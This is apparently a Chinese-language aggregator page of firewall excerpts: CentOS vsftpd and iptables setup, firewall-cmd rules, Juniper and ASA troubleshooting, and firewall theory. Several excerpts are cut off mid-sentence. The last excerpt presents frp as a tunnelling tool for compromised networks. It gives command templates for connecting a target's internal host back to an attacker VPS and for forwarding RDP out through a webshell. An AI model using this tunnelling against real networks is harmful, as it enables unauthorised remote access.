防火墙

Liunx外部文件的传输，避免不了使用FTP服务，所以现在就整理下，CentOS7环境下，FTP服务的搭建。FTP服务器需要安装vsftp服务端软件。我们知道，在建立vsftpd用户时，我们一般是在linux下建立用户useradd的方式来访问ftp，但有时我们只想提供ftp服务，而避免用户用ftp的帐号去登录linux，采用一般的方式只能是限制该用户的访问权限，但还是避免不了用户登录进linux系统，所以比较好的方法是用vsftpd的虚拟用户（virtual users）。 һ 、 CentOS 7.0默认使用的是firewall作为防火墙，这里改为iptables防火墙(有的已经有iptable防火墙)。() 1、安装iptables防火墙(有iptables防火墙的可以忽略这一步) yum install iptables- services #安装 vi /etc/sysconfig/iptables #编辑防火墙配置文件，添加下面红色部分进入iptables，说明：21端口是ftp服务端口；10060到10090是Vsftpd被动模式需要的端口，可自定义一段大于1024的tcp端口 　-A INPUT -m state --state NEW -m tcp -p tcp --dport 10060:10090 -j ACCEPT 二、关闭防火墙 1、关闭firewall：

防火墙 查看防火墙状态 firewall-cmd --state 关闭防火墙 systemctl stop firewalld.service 开启防火墙 systemctl start firewalld.service 文章来源: CentOS7常用操作命令

1、firewall相关的操作 查看防火墙状态 关闭防火墙 开启防火墙 禁止开机启动启动防火墙 2.1常规命令 关闭iptables防火墙的命令是： 查看iptables防火墙状态的命令是： 执行重启iptables防火墙的命令，命令是： 2.3 使用执行命令的方式开放特定端口 在不手动修改iptables防火墙的配置文件的情况下，使用命令做到放行某些常用端口，命令集合是： iptables -P INPUT ACCEPT iptables -A INPUT -p tcp --dport8080 -j ACCEPT iptables -A INPUT -p tcp --dport8088 -j ACCEPT 文章来源: centos7.5(CentOS-7-x86_64-Minimal-1804)配置防火墙及操作命令(实测)

前几天遇到个问题，我们需要连接子公司的数据库取查询业务数据，数据库是oracle11g的。由于子公司和总部有物理网络的隔离，因此在连接对方的时候中间经过了防火墙，网络管理员配置访问策略后，我们使用PLSQL客户端去查询验证数据，发现可以正常登录客户端，但是只要执行查询语句，PLSQL软件就卡死了，然后还无法取消，最后只能通过任务管理器强行杀掉进程，每次执行都是这样的。 然后换了其他几个软件，发现sqlplus可以正常使用，但是一旦换了PLSQLDevelpoer的时候就成老样子了，当时觉得可能是驱动的问题，因为我们用的驱动是10g32bit的，为了验证这个问题，把客户端的驱动升级到了11g64bit，问题依旧存在。 然后想到是不是网络限速导致的，和两边的网关管理员再三确认，两边都表是没有配置任何形式的限速。 一时理不清头绪，纠结了好几天。不断的查看各种网帖，最后终于找到个类似的问题，里面说是防火墙的问题，于是赶紧联系网管查了一下，我们的防火墙上还真有这个选项 ，按照建议把这个选项取消后，一切都正常了 又一次长经验了。 如果防火墙是 JUNIPER 的，需要调整下设置：在juniper设置里面Security -> ALG -> SQL 的勾去掉 在 JUNIPER JUNOS 6.1以下版本使用：set alg sql disable; 在 JUNIPER JUNOS 6.2,6

1.服务器：安装软件包。 2.服务器：启动服务，载入启动项，检查服务状态。 3.服务器：配置防火墙富规则，重新载入防火墙配置文件，让防火墙重新生效。 4.服务器：编写服务器网页配置文件 5.服务器：重启网页服务，查看服务状态。 6.客户端：通过网页服务进行访问，可以访问，任务完成。 文章来源: 12-配置WEB网页站点

拒绝该ip地址以外的icmp访问 firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source NOT address="xx.xx.xx.xx/28" protocol vaiue="icmp" reject' 只允许改地址访问 firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="xx.xx.xx.xx/29" accept' 添加端口 firewall-cmd --permanent --add-port="xxxx/upd" firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="xx.xx.xx.xx" accept' 文章来源: firewall 防火墙配置

主要有几个方面需要检查： 一、检查NAT配置是否正确 二、检查ACL是否欠缺 包括几个方向：outside->inside/dmz，dmz->inside/outside 三、检查命令中call-home reporting anonymous是否no掉 文章来源: ASA防火墙NAT发布失效

1、定义：防火墙是由软件和硬件组成的系统，它处于安全的网络（通常是内部局域网）和不安全的网络之间，根据由系统管理员设置的访问控制规则，对数据流进行过滤。 2、防火墙对数据流有三种处理方式：1）允许数据流通过；2）拒绝数据流通过；3）将这些数据流丢弃。当数据流被拒绝时，防火墙要向发送者回复一条消息进行提示。当数据流被丢弃时，防火墙不会对这些数据包进行任何处理，也不会向发送者发送任何提示信息。 3、防火墙的要求：1）所有进出网络的数据流都必须经过防火墙；2）只允许经过授权的数据流通过防火墙；3）防火墙自身对入侵是免疫的。 4、根据防火墙在网络协议栈中的过滤层次不同，通常把防火墙分为3种：包过滤防火墙、电路级网关防火墙和应用级网关防火墙。 5、防火墙对开放系统互联模型（OSI）中各层协议所产生的数据流进行检查。要知道防火墙是哪种类型的结构，关键是要知道防火墙工作于OSI模型中的哪一层。防火墙工作于OSI模型的层次越高，其检查数据包中的信息就越多，因此防火墙所消耗的处理器工作周期就越长，所提供的安全保护等级就越好。 6、网络地址转换 1）静态网络地址转换：在进行网络映射时，内部网络地址与外部的Internet IP地址是一一对应的关系。在这种情况下，不需要NAT盒在地址转换时记录转换信息。 2）动态网络地址转换：可用的Internet IP地址限定在一个范围

本组工作中选出的具备参考价值的资料： 网址、书籍（标注书名，内容范围）等，并附带详细的侧重点说明，也可发表个人技术贴 文章来源: 技术共享――逆向防火墙（模板）

frp https://github.com/fatedier/frp/ frp 是一个可用于内网穿透的高性能的反向代理应用，支持 tcp, udp 协议，为 http 和 https 应用协议提供了额外的能力，且尝试性支持了点对点穿透 跨平台支持linux，win，mac 类似于ngrok，运维、开发人员经常使用它管理内网机器和调试程序，例如将内网的22，3389转发到公网，开发人员将本地web服务转发到公网调试，msf/rat远控的内网上线，可以代替前几年流行的”内网通”服务 优点：不需要免杀，支持加密传输 在有公网ip的vps上部署服务端，然后在目标的内网机器上运行客户端即可反连公网机器，根据配置把内网中的目的端口转发到公网的那台机器上。网上也有一些免费和收费frp服务，可以免去自己部署服务端。 简单示例： 服务端和客户端均支持配置文件ini运行和命令行运行，下面示例为命令行。 12 服务端：./frps -p <服务监听端口> -t <token>客户端：./frpc tcp -s <服务端ip>:<服务端端口> -r <在服务端监听的对应端口> -i <内网地址> -l <内网端口> -t <token> --ue --uc 例如通过webshell转发出该机器的3389端口 12 你的机器：./frps -p 7890 -t woshitokenWebshell: